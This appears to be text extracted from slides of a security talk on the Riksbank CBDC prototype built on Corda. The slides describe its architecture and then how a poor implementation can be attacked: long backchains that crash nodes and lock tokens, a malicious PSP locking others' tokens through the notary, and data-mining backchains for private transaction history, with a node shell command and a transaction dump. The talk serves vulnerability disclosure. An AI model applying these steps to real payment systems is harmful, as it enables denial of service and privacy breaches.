Detailed system description of the prototype
5
Detailed system description of the prototype
User
6
Detailed system description of the prototype
App
User
Security and logic, e.g.
•
PIN
•
Signing transactions
•
Encryption
7
Detailed system description of the prototype
App
Disk
User
Security and logic, e.g.
•
PIN
•
Signing transactions
•
Encryption
Storage of
•
PIN
•
Private key for tokens
•
Authentication keys
•
Message keys, e.g. Firebase
8
Detailed system description of the prototype
App
Disk
Security and logic, e.g.
•
PIN
•
Signing transactions
•
Encryption
Storage of
•
PIN
•
Private key for tokens
•
Authentication keys
•
Message keys, e.g. Firebase
9
Detailed system description of the prototype
App
Disk
PSP1
business
logic
Security and logic, e.g.
•
Authentication
•
Push messages, e.g. Firebase
•
Limits
•
Back office functions
10
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
Security and logic, e.g.
•
Authentication
•
Push messages, e.g. Firebase
•
Limits
•
Back office functions
Storage of
•
Authentication keys
•
Payment history
•
Customer data
•
Message keys, e.g. Firebase
11
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
PSP1
Corda
node
Security and logic, e.g.
•
Token transactions
•
Token verification
•
Wallet management
12
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
PSP1
Corda
node
Security and logic, e.g.
•
Token transactions
•
Token verification
•
Wallet management
Storage of
•
Public keys (and PSP1 private keys)
•
Wallets
•
Tokens
•
Backchain
•
Certificates
13
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
Riksbank
Corda
node
PSP1
Corda
node
Security and logic, e.g.
•
Issue and redeem
•
Token verification
•
Corda network management
14
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
Riksbank
Corda
node
PSP1
Corda
node
DB
Security and logic, e.g.
•
Issue and redeem
•
Token verification
•
Corda network management
Storage of
•
Public keys (and Riksbank private keys)
•
Backchain
•
Certificates
15
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
Riksbank
Corda
node
PSP1
Corda
node
Riksbank
Corda
notary
DB
Security and logic, e.g.
•
Prevent double-spends
•
Sign the transaction
16
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
Riksbank
Corda
node
PSP1
Corda
node
Riksbank
Corda
notary
DB
DB
Security and logic, e.g.
•
Prevent double-spends
•
Sign the transaction
Storage of
•
Notary private key
•
Hashes of tokens
•
Certificates
17
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
Riksbank
Corda
node
PSP1
Corda
node
Riksbank
Corda
notary
Riksbank
business
logic
DB
DB
Security and logic, e.g.
•
Interest
•
Back office functions
18
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
Riksbank
Corda
node
PSP1
Corda
node
Riksbank
Corda
notary
Riksbank
business
logic
DB
DB
DB
Security and logic, e.g.
•
Interest
•
Back office functions
Storage of
•
Outstanding CBDC
19
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
Riksbank
Corda
node
PSP1
Corda
node
Riksbank
Corda
notary
Riksbank
business
logic
Riksbank
RTGS
DB
DB
DB
DB
20
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
Riksbank
Corda
node
PSP1
Corda
node
Riksbank
Corda
notary
Riksbank
business
logic
Riksbank
RTGS
DB
DB
DB
DB
User alias
Logic
Security and logic, e.g.
•
Add and remove alias
•
Map alias to PSP and wallet
21
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
Riksbank
Corda
node
PSP1
Corda
node
Riksbank
Corda
notary
Riksbank
business
logic
Riksbank
RTGS
DB
DB
DB
DB
User alias
Logic
DB
Security and logic, e.g.
•
Add and remove alias
•
Map alias to PSP and wallet
Storage of
•
Alias PSP and wallet
22
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
Riksbank
Corda
node
PSP1
Corda
node
Riksbank
Corda
notary
Riksbank
business
logic
Riksbank
RTGS
DB
PSPn
Corda
node
PSP3
Corda
node
DB
PSP2
Corda
node
DB
DB
DB
DB
DB
User alias
Logic
DB
23
What is backchain?
And how to exploit bad implementation...
24
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
25
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
26
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
27
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
28
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Tx: 1
29
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
30
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
31
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
32
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
Tx: 2
33
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
34
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
35
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
36
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
PSP2
Corda
node
UserA => UserB
50
37
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
PSP2
Corda
node
UserA => UserB
50
38
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
PSP2
Corda
node
UserA => UserB
50
Tx: 3
39
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
PSP2
Corda
node
UserA => UserB
50
Token#: 3[0]
Amount: 50
Owner: UserB
Sign: UserA
Reference: 2[0]
Tx: 3
40
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
PSP2
Corda
node
UserA => UserB
50
Token#: 3[0]
Amount: 50
Owner: UserB
Sign: UserA
Reference: 2[0]
Tx: 3
Token#: 3[1]
Amount: 150
Owner: UserA
Sign: UserA
Reference: 2[0]
41
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
PSP2
Corda
node
UserA => UserB
50
Token#: 3[0]
Amount: 50
Owner: UserB
Sign: UserA
Reference: 2[0]
Tx: 3
Token#: 3[1]
Amount: 150
Owner: UserA
Sign: UserA
Reference: 2[0]
42
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
43
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
Withdrawal 3 and deposit 2
44
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
Withdrawal 3 and deposit 2
Token#2
197
PSP1
Token#3
3
UserA
45
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
Withdrawal 3 and deposit 2
Token#2
197
PSP1
Token#6
2
PSP1
Token#5
1
UserA
Token#3
3
UserA
46
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
Withdrawal 3 and deposit 2
Token#2
197
PSP1
Token#6
2
PSP1
Token#5
1
UserA
Historic
Transactions
Token#3
3
UserA
47
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
Withdrawal 3 and deposit 2
Token#2
197
PSP1
Token#6
2
PSP1
Token#5
1
UserA
Historic
Transactions
Token#3
3
UserA
48
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
Withdrawal 3 and deposit 2
Token#2
197
PSP1
Token#6
2
PSP1
Token#5
1
UserA
Historic
Transactions
Token#3
3
UserA
49
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
So UserA does this over and over again
Token#2
197
PSP1
Token#6
2
PSP1
Token#5
1
UserA
Historic
Transactions
Token#3
3
UserA
50
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
So UserA does this over and over again
Token#2
197
PSP1
Token#6
2
PSP1
Token#5
1
UserA
Historic
Transactions
Token#3
3
UserA
Token#7
194
PSP1
Token#8
3
PSP1
51
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
So UserA does this over and over again
Token#2
197
PSP1
Token#6
2
PSP1
Token#5
1
UserA
Historic
Transactions
Token#3
3
UserA
Token#7
194
PSP1
Token#8
3
PSP1
Token#10
2
PSP1
Token#9
1
UserA
52
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
So UserA does this over and over again
Token#6
2
PSP1
Token#5
1
UserA
Historic
Transactions
Token#3
3
UserA
Token#7
194
PSP1
Token#10
2
PSP1
Token#9
1
UserA
Token#2
197
PSP1
Token#8
3
PSP1
53
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
Many times
Token#6
2
PSP1
Token#5
1
UserA
Historic
Transactions
Token#3
3
UserA
Token#x
44
PSP1
Token#10
2
PSP1
Token#9
1
UserA
Token#2
197
PSP1
Token#8
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
54
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
Deposit all tokens
Token#6
2
PSP1
Token#5
1
UserA
Historic
Transactions
Token#3
3
UserA
Token#x
44
PSP1
Token#10
2
PSP1
Token#9
1
UserA
Token#2
197
PSP1
Token#8
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#n
12
PSP1
55
How to exploit token selection and long
backchains
Token#1
200
PSP1
Token#6
2
PSP1
Token#5
1
UserA
Token#3
3
UserA
Token#x
44
PSP1
Token#2
197
PSP1
Token#8
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
2
PSP1
Token#n
12
PSP1
PSP1 Admin
Riksbank Corda node
Redeem
Token#9
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#10
2
PSP1
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
2
Token#x
56
Other setups with better effects
1500
PSP1
2000
PSP1
3000
PSP1
Several issue tokens to
get several merkle trees
100
UserA
57
Other setups with better effects
1500
PSP1
2000
PSP1
3000
PSP1
Several issue tokens to
get several merkle trees
Split tokens into hundreds
100
UserA
1
UserB
1
UserB
1
UserB
1
UserB
1
UserB
1
UserB
58
Other setups with better effects
1500
PSP1
2000
PSP1
3000
PSP1
Several issue tokens to
get several merkle trees
Split tokens into hundreds
100
UserA
1
UserB
1
UserB
1
UserB
1
UserB
1
UserB
1
UserB
Use hundreds of tokens in one transaction
5
UserA
59
Other setups with better effects
1500
PSP1
2000
PSP1
3000
PSP1
Several issue tokens to
get several merkle trees
Split tokens into hundreds
100
UserA
1
UserB
1
UserB
1
UserB
1
UserB
1
UserB
1
UserB
Use hundreds of tokens in one transaction
5
UserA
And do this over and over again
to get the TransactionOfDeath
60
Crash nodes with TransactionOfDeath
and permanently lock tokens
Sometimes crashes gives inconsistencies.
PSP1
Corda
node
PSP3
Corda
node
UserA => UserC
Token#1
5
UserA
Token#2
5
UserC
61
Crash nodes with TransactionOfDeath
and permanently lock tokens
Sometimes crashes gives inconsistencies.
PSP1
Corda
node
PSP3
Corda
node
UserA => UserC
Riksbank
Corda
notary
Token#1
5
UserA
Token#2
5
UserC
Mark Token#1 as used
62
Crash nodes with TransactionOfDeath
and permanently lock tokens
Sometimes crashes gives inconsistencies.
PSP1
Corda
node
PSP3
Corda
node
UserA => UserC
Riksbank
Corda
notary
Token#1
5
UserA
Token#2
5
UserC
Mark Token#1 as used
63
Crash nodes with TransactionOfDeath
and permanently lock tokens
Sometimes crashes gives inconsistencies.
PSP1
Corda
node
PSP3
Corda
node
UserA => UserC
Riksbank
Corda
notary
Token#1
5
UserA
Token#2
5
UserC
Mark Token#1 as used
Used token: Token#1
Available token: Token#1
64
Network problems, timeouts, in memory
token selection and lock tokens until restarted
Card payments in the prototype phase 1 is a signed transaction on the smart card traveling through the
PSP of the Merchant to card holder PSP.
PSP1
Corda
node
PSP3
Corda
node
UserC => UserA
65
UserC
Network problems, timeouts, in memory
token selection and lock tokens until restarted
Card payments in the prototype phase 1 is a signed transaction on the smart card traveling through the
PSP of the Merchant to card holder PSP.
PSP1
Corda
node
PSP3
Corda
node
UserC => UserA
Token#2
5
UserA
Token#1
5
UserC
66
UserC
Network problems, timeouts, in memory
token selection and lock tokens until restarted
Card payments in the prototype phase 1 is a signed transaction on the smart card traveling through the
PSP of the Merchant to card holder PSP.
PSP1
Corda
node
PSP3
Corda
node
UserC => UserA
Riksbank
Corda
notary
Token#2
5
UserA
Token#1
5
UserC
Mark Token#1 as used
67
UserC
Network problems, timeouts, in memory
token selection and lock tokens until restarted
Card payments in the prototype phase 1 is a signed transaction on the smart card traveling through the
PSP of the Merchant to card holder PSP.
PSP1
Corda
node
PSP3
Corda
node
UserC => UserA
Riksbank
Corda
notary
Token#2
5
UserA
Token#1
5
UserC
Mark Token#1 as used
68
UserC
Network problems, timeouts, in memory
token selection and lock tokens until restarted
Card payments in the prototype phase 1 is a signed transaction on the smart card traveling through the
PSP of the Merchant to card holder PSP.
PSP1
Corda
node
PSP3
Corda
node
UserC => UserA
Riksbank
Corda
notary
Token#2
5
UserA
Token#1
5
UserC
Mark Token#1 as used
Available token: Token#1
Timeout!
Error!
69
UserC
Network problems, timeouts, in memory
token selection and lock tokens until restarted
Card payments in the prototype phase 1 is a signed transaction on the smart card traveling through the
PSP of the Merchant to card holder PSP.
PSP1
Corda
node
PSP3
Corda
node
UserC => UserA
Riksbank
Corda
notary
Token#2
5
UserA
Token#1
5
UserC
Mark Token#1 as used
Used token: Token#1
Available token: Token#1
Timeout!
Error!
70
UserC
Evil PSP can lock tokens of other PSPs
As the evil PSP has the information about the tokens sent to others, the evil PSP can send those tokens to
the non validating notary node to be marked as used.
EvilPSP
Corda
node
PSP3
Corda
node
UserA => UserC
ing.com
https://www.ingwb.com/media/3024436/
solutions-for-the-corda-security-and-privacy-
trade-off_-whitepaper.pdf
71
Evil PSP can lock tokens of other PSPs
As the evil PSP has the information about the tokens sent to others, the evil PSP can send those tokens to
the non validating notary node to be marked as used.
EvilPSP
Corda
node
PSP3
Corda
node
UserA => UserC
Token#1
5
UserA
Token#2
5
UserC
ing.com
https://www.ingwb.com/media/3024436/
solutions-for-the-corda-security-and-privacy-
trade-off_-whitepaper.pdf
72
Evil PSP can lock tokens of other PSPs
As the evil PSP has the information about the tokens sent to others, the evil PSP can send those tokens to
the non validating notary node to be marked as used.
EvilPSP
Corda
node
PSP3
Corda
node
UserA => UserC
Riksbank
Corda
notary
Token#1
5
UserA
Token#2
5
UserC
Mark Token#1 as used
ing.com
https://www.ingwb.com/media/3024436/
solutions-for-the-corda-security-and-privacy-
trade-off_-whitepaper.pdf
73
Evil PSP can lock tokens of other PSPs
As the evil PSP has the information about the tokens sent to others, the evil PSP can send those tokens to
the non validating notary node to be marked as used.
EvilPSP
Corda
node
PSP3
Corda
node
UserA => UserC
Riksbank
Corda
notary
Token#1
5
UserA
Token#2
5
UserC
Mark Token#1 as used
Used token: Token#1
Available token: Token#2
ing.com
https://www.ingwb.com/media/3024436/
solutions-for-the-corda-security-and-privacy-
trade-off_-whitepaper.pdf
74
Evil PSP can lock tokens of other PSPs
As the evil PSP has the information about the tokens sent to others, the evil PSP can send those tokens to
the non validating notary node to be marked as used.
EvilPSP
Corda
node
PSP3
Corda
node
UserA => UserC
Riksbank
Corda
notary
Token#1
5
UserA
Token#2
5
UserC
Mark Token#1 as used
Used token: Token#1
Available token: Token#2
Mark Token#2 as used
Used token: Token#2
ing.com
https://www.ingwb.com/media/3024436/
solutions-for-the-corda-security-and-privacy-
trade-off_-whitepaper.pdf
75
PSP1 Corda
And an ending note on token selection
Token#3
1000000
Owner:
PSP1
Token#2
1000000
Owner:
PSP1
Token#1
2000000
Owner:
PSP1
PSP1 UserA
PSP1 Admin
76
PSP1 Corda
And an ending note on token selection
Token#3
1000000
Owner:
PSP1
Token#2
1000000
Owner:
PSP1
Token#1
2000000
Owner:
PSP1
PSP1 UserA
PSP1 Admin
Redeem 3500000
Withdraw 50
77
PSP1 Corda
And an ending note on token selection
Token#3
1000000
Owner:
PSP1
Token#2
1000000
Owner:
PSP1
Token#1
2000000
Owner:
PSP1
PSP1 UserA
PSP1 Admin
Redeem 3500000
Withdraw 50
78
3500000 not available!
Try Again!
PSP1 Corda
And an ending note on token selection
Token#3
1000000
Owner:
PSP1
Token#2
1000000
Owner:
PSP1
Token#1
2000000
Owner:
PSP1
PSP1 UserA
PSP1 Admin
Withdraw 50
79
3500000 not available!
Try Again!
PSP1 Corda
And an ending note on token selection
Token#3
1000000
Owner:
PSP1
Token#2
1000000
Owner:
PSP1
Token#1
2000000
Owner:
PSP1
PSP1 UserA
Token#4
999950
Owner:
PSP1
PSP1 Admin
Token#5
50
Owner:
UserA
Got 50
80
Backchain and privacy
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
Token#: 3[0]
Amount: 50
Owner: UserB
Sign: UserA
Reference: 2[0]
Tx: 3
Token#: 3[1]
Amount: 150
Owner: UserA
Sign: UserA
Reference: 2[0]
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
PSP1
Corda
node
UserA withdraw
200
PSP2
Corda
node
UserA => UserB
50
To be able to verify authenticity of the tokens all historic transactions for that token is needed.
81
Backchain and privacy
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
Token#: 3[0]
Amount: 50
Owner: UserB
Sign: UserA
Reference: 2[0]
Tx: 3
Token#: 3[1]
Amount: 150
Owner: UserA
Sign: UserA
Reference: 2[0]
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
PSP1
Corda
node
UserA withdraw
200
PSP2
Corda
node
UserA => UserB
50
To be able to verify authenticity of the tokens all historic transactions for that token is needed.
82
Backchain and privacy
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
Token#: 3[0]
Amount: 50
Owner: UserB
Sign: UserA
Reference: 2[0]
Tx: 3
Token#: 3[1]
Amount: 150
Owner: UserA
Sign: UserA
Reference: 2[0]
PSP1
Corda
node
Issue
1000
PSP1
Corda
node
UserA withdraw
200
PSP2
Corda
node
UserA => UserB
50
So PSP2 can see how PSP1 have done the issue and how the UserA withdrawn 200.
83
Backchain and privacy
Older and longer backchains reveals more.
PSP2 Admin
84
Backchain and privacy
Older and longer backchains reveals more.
UserA
PSP1
UserH
PSP2
60
PSP2 Admin
85
Backchain and privacy
Older and longer backchains reveals more.
UserC
PSP3
UserG
PSP1
UserA
PSP1
50
20
UserH
PSP2
60
PSP2 Admin
86
Backchain and privacy
Older and longer backchains reveals more.
UserD
PSP4
UserF
PSP4
UserC
PSP3
50
UserG
PSP1
50
UserA
PSP1
50
20
UserH
PSP2
60
PSP2 Admin
87
Backchain and privacy
UserA
PSP1
Older and longer backchains reveals more.
UserD
PSP4
325
UserE
PSP4
UserF
PSP4
100
UserC
PSP3
50
UserG
PSP1
50
UserA
PSP1
50
20
UserH
PSP2
60
PSP2 Admin
88
Backchain and privacy
PSP1
UserA
PSP1
withdraw
200
Older and longer backchains reveals more.
UserC
PSP3
75
UserD
PSP4
325
PSP4
UserE
PSP4
withdraw
400
UserF
PSP4
UserF
PSP4
100
100
UserC
PSP3
50
UserG
PSP1
50
UserA
PSP1
50
20
UserH
PSP2
60
PSP2 Admin
89
Backchain and privacy
PSP1
Issue
1000
UserA
PSP1
withdraw
200
Older and longer backchains reveals more.
PSP3
UserC
PSP3
withdraw
150
75
UserD
PSP4
325
PSP4
Issue
3000
UserE
PSP4
withdraw
400
UserF
PSP4
100
UserF
PSP4
100
100
UserC
PSP3
50
UserG
PSP1
50
UserA
PSP1
50
20
UserH
PSP2
60
PSP2 Admin
90
Backchain and privacy
PSP1
Issue
1000
UserA
PSP1
withdraw
200
Older and longer backchains reveals more.
PSP3
Issue
5000
UserC
PSP3
withdraw
150
75
UserD
PSP4
325
PSP4
Issue
3000
UserE
PSP4
withdraw
400
UserF
PSP4
100
UserF
PSP4
100
100
UserC
PSP3
50
UserG
PSP1
50
UserA
PSP1
50
20
UserH
PSP2
60
PSP2 Admin
91
Practical example: PSP2 backchain
Admin of PSP2 has only information from the PSP2 Corda node and business layer of PSP2.
To be able to get the backchain and to visualize it PSP2 admin has to:
• Extract the backchain
• Get the transactions
• Datamine
• Visualize
92
Practical example: Extract the backchain
Login to PSP2 Corda node and start the Corda node shell.
Run the command
run internalVerifiedTransactionsSnapshot
93
Practical example: PSP2 backchain
- wire:
id: "6BE4262593EA89C5097FED35221CC0A27FE78F7BB6C10864E4E28269E8F2F038"
inputs:
- txhash: "5C8618DCFB36BFABB0B6DB66331EBEDB3699F50F4AC8FD2EB7291BD782DF5C53"
index: 0
outputs:
- data: !<com.r3.corda.lib.tokens.contracts.states.FungibleToken>
amount: "100.85 SEK issued by Riksbanken"
holder:
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTGL7RG71TWPEaZJhNFKWZWRp7jCHtRqYdZshmAv1tawKDd55qDnXDFmkUSvMqQhaRdxaMPYinLSop88JwAPReBZJw"
- data: !<com.r3.corda.lib.tokens.contracts.states.FungibleToken>
amount: "5399.15 SEK issued by Riksbanken"
holder:
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTFUZVr3NjFk7sDNTBjdg3q9sJNbZKfTVhDQ8vcyisu9mWsoMPA1Heqbb3ZbNirZFnBpgkuVDW7yWYsDiBWLGYdmDh"
commands:
- value: !<com.r3.corda.lib.tokens.contracts.commands.MoveTokenCommand>
token:
issuer: "O=Riksbanken, L=Stockholm, C=SE"
tokenType:
tokenIdentifier: "SEK"
inputs:
- 0
outputs:
- 0
- 1
signers:
- "aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTFUZVr3NjFk7sDNTBjdg3q9sJNbZKfTVhDQ8vcyisu9mWsoMPA1Heqbb3ZbNirZFnBpgkuVDW7yWYsDiBWLGYdmDh"
94
Practical example: PSP2 backchain
- wire:
id: "6BE4262593EA89C5097FED35221CC0A27FE78F7BB6C10864E4E28269E8F2F038"
inputs:
- txhash: "5C8618DCFB36BFABB0B6DB66331EBEDB3699F50F4AC8FD2EB7291BD782DF5C53"
index: 0
outputs:
- data: !<com.r3.corda.lib.tokens.contracts.states.FungibleToken>
amount: "100.85 SEK issued by Riksbanken"
holder:
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTGL7RG71TWPEaZJhNFKWZWRp7jCHtRqYdZshmAv1tawKDd55qDnXDFmkUSvMqQhaRdxaMPYinLSop88JwAPReBZJw"
- data: !<com.r3.corda.lib.tokens.contracts.states.FungibleToken>
amount: "5399.15 SEK issued by Riksbanken"
holder:
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTFUZVr3NjFk7sDNTBjdg3q9sJNbZKfTVhDQ8vcyisu9mWsoMPA1Heqbb3ZbNirZFnBpgkuVDW7yWYsDiBWLGYdmDh"
commands:
- value: !<com.r3.corda.lib.tokens.contracts.commands.MoveTokenCommand>
token:
issuer: "O=Riksbanken, L=Stockholm, C=SE"
tokenType:
tokenIdentifier: "SEK"
inputs:
- 0
outputs:
- 0
- 1
signers:
- "aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTFUZVr3NjFk7sDNTBjdg3q9sJNbZKfTVhDQ8vcyisu9mWsoMPA1Heqbb3ZbNirZFnBpgkuVDW7yWYsDiBWLGYdmDh"
95
Practical example: PSP2 backchain
- wire:
id: "6BE4262593EA89C5097FED35221CC0A27FE78F7BB6C10864E4E28269E8F2F038"
inputs:
- txhash: "5C8618DCFB36BFABB0B6DB66331EBEDB3699F50F4AC8FD2EB7291BD782DF5C53"
index: 0
outputs:
- data: !<com.r3.corda.lib.tokens.contracts.states.FungibleToken>
